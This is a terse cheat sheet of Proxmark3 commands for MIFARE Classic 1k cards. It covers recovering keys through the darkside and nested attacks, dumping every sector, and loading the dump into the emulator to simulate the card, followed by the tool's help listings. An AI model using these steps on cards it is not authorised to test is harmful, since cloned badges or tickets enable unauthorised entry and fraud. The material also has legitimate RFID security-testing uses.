hf 14a read // make sure its a mfc 1k hf mf chk *1 ? t // chk for manufacturer keys - or - hf mf mifare // darkside attack dump card ----------- hf mf nested 1 0 a ffffffffffff d // card type MIFARE CLASSIC 1k (1) nested attack with sector 0 (0) enc with key A (a) FFFFFFFFFFFF and dump (d) keys to file hf mf dump // dump raw sectors -or- dump1k // raw dumping all sectors emulate ------------- hf mf nested 1 0 a FFFFFFFFFFFF t // see above (except not writing to file) hf mf efill a FFFFFFFFFFFF // fill dump sectors hf mf esave filename // save emulator dump to file hf mf eload filename // where filename = dump filename (.eml) hf mf sim // start emu from manpages ---------------- proxmark3> hf 14a help Display help list List ISO 14443a history reader Acts same as ISO14443 Type A reader sim -- Fake ISO 14443a tag snoop Eavesdrop ISO 14443 Type A proxmark3> hf mf help This help dbg Set default debug mode rdbl Read MIFARE classic block rdsc Read MIFARE classic sector dump1k Dump MIFARE classic tag to binary file restore1k Restore MIFARE classic binary file to BLANK tag wrbl Write MIFARE classic block chk Test block up to 8 keys mifare Read parity error messages. param - nested Test nested authentication sim Simulate MIFARE 1k card eclr Clear simulator memory block eget Get simulator memory block eset Set simulator memory block eload Load from file emul dump esave Save to file emul dump ecfill Fill simulator memory with help of keys from simulator ekeyprn Print keys from simulator memory